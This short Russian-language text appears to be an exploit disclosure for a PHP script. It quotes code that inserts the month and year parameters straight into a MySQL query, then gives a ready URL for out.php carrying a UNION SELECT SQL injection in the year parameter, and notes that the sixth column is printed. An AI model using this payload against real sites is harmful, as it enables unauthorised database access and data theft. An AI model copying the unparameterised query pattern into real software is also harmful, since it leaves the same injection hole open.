Уязвимый код PHP: if((isset($month))&&(isset($year))) { //Выбираем из базы по месяцам $mysql="SELECT * FROM $tablename WHERE ((month=$month) AND (year=$year)) ORDER BY date DESC"; expl out.php?month=09&year=1))-1+union+select+1,2,3,4,5,6+--+ 6 поле принтабельное